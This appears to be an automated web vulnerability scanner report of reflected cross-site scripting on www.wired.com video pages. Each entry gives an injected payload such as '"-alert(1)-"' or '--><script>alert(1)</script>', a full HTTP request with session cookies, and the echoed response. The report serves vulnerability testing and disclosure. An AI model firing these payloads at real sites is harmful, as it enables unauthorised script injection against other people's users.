<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb6b6"-alert(1)-"4e116abbec8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/avatar-extended-collectors-edition/628119810001fb6b6"-alert(1)-"4e116abbec8 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 01:01:50 GMT Date: Mon, 22 Nov 2010 00:56:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106707
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4644"><a>05c932d0f68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/avatar-extended-collectors-edition/628119810001d4644"><a>05c932d0f68 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=283 Expires: Mon, 22 Nov 2010 01:00:38 GMT Date: Mon, 22 Nov 2010 00:55:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_avatar-extended-collectors-edition c_628119810001d4644"><a>05c932d0f68"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64d32"><a>32ba8c93064 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video64d32"><a>32ba8c93064/behind-the-scenes-2012/69568495001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29398 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:55:27 GMT Date: Mon, 22 Nov 2010 00:50:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video64d32"><a>32ba8c93064 ss_behind-the-scenes-2012 c_69568495001"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 33770--><script>alert(1)</script>9aa5c2d1631 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video33770--><script>alert(1)</script>9aa5c2d1631/behind-the-scenes-2012/69568495001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29432 Vary: Accept-Encoding Cache-Control: max-age=272 Expires: Mon, 22 Nov 2010 00:55:38 GMT Date: Mon, 22 Nov 2010 00:51:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video33770--><script>alert(1)</script>9aa5c2d1631/behind-the-scenes-2012/69568495001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d6dd"><a>fd0757c5f70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-20124d6dd"><a>fd0757c5f70/69568495001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=295 Expires: Mon, 22 Nov 2010 00:56:10 GMT Date: Mon, 22 Nov 2010 00:51:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-20124d6dd"><a>fd0757c5f70 c_69568495001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50784"-alert(1)-"fe00a872adb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-201250784"-alert(1)-"fe00a872adb/69568495001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=270 Expires: Mon, 22 Nov 2010 00:56:42 GMT Date: Mon, 22 Nov 2010 00:52:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106742
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be55a"-alert(1)-"9e0b3694c11 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-2012/69568495001be55a"-alert(1)-"9e0b3694c11 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:58:44 GMT Date: Mon, 22 Nov 2010 00:53:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce64a"><a>8daa3aab393 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-2012/69568495001ce64a"><a>8daa3aab393 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=294 Expires: Mon, 22 Nov 2010 00:57:24 GMT Date: Mon, 22 Nov 2010 00:52:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-2012 c_69568495001ce64a"><a>8daa3aab393"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3887d"><a>2f22d43b5dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video3887d"><a>2f22d43b5dd/behind-the-scenes-disney-epic-mickey-video-game/625093660001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29450 Vary: Accept-Encoding Cache-Control: max-age=289 Expires: Mon, 22 Nov 2010 00:56:25 GMT Date: Mon, 22 Nov 2010 00:51:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video3887d"><a>2f22d43b5dd ss_behind-the-scenes-disney-epic-mickey-video-game c_625093660001"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload eef9d--><script>alert(1)</script>94cd6923bf8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoeef9d--><script>alert(1)</script>94cd6923bf8/behind-the-scenes-disney-epic-mickey-video-game/625093660001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29483 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:32 GMT Date: Mon, 22 Nov 2010 00:52:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoeef9d--><script>alert(1)</script>94cd6923bf8/behind-the-scenes-disney-epic-mickey-video-game/625093660001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b028"-alert(1)-"fe00e1d27f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-disney-epic-mickey-video-game9b028"-alert(1)-"fe00e1d27f6/625093660001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=288 Expires: Mon, 22 Nov 2010 00:58:35 GMT Date: Mon, 22 Nov 2010 00:53:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106794
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab0ae"><a>c48df1a3910 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-disney-epic-mickey-video-gameab0ae"><a>c48df1a3910/625093660001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=299 Expires: Mon, 22 Nov 2010 00:57:33 GMT Date: Mon, 22 Nov 2010 00:52:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106810
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-disney-epic-mickey-video-gameab0ae"><a>c48df1a3910 c_625093660001"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cf33"><a>a6ba26af663 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-disney-epic-mickey-video-game/6250936600019cf33"><a>a6ba26af663 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=274 Expires: Mon, 22 Nov 2010 00:58:24 GMT Date: Mon, 22 Nov 2010 00:53:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-disney-epic-mickey-video-game c_6250936600019cf33"><a>a6ba26af663"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 658e0"-alert(1)-"b69aaac7020 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-disney-epic-mickey-video-game/625093660001658e0"-alert(1)-"b69aaac7020 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:48 GMT Date: Mon, 22 Nov 2010 00:54:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106733
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 7497c--><script>alert(1)</script>b5e658dbc0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video7497c--><script>alert(1)</script>b5e658dbc0e/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29479 Vary: Accept-Encoding Cache-Control: max-age=297 Expires: Mon, 22 Nov 2010 00:57:54 GMT Date: Mon, 22 Nov 2010 00:52:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video7497c--><script>alert(1)</script>b5e658dbc0e/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23bbc"><a>8ef2b5259b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video23bbc"><a>8ef2b5259b3/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29446 Vary: Accept-Encoding Cache-Control: max-age=288 Expires: Mon, 22 Nov 2010 00:56:59 GMT Date: Mon, 22 Nov 2010 00:52:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video23bbc"><a>8ef2b5259b3 ss_behind-the-scenes-doctor-who-the-hungry-earth c_664817239001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84cbf"-alert(1)-"407319541ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-doctor-who-the-hungry-earth84cbf"-alert(1)-"407319541ef/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:09 GMT Date: Mon, 22 Nov 2010 00:54:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106729
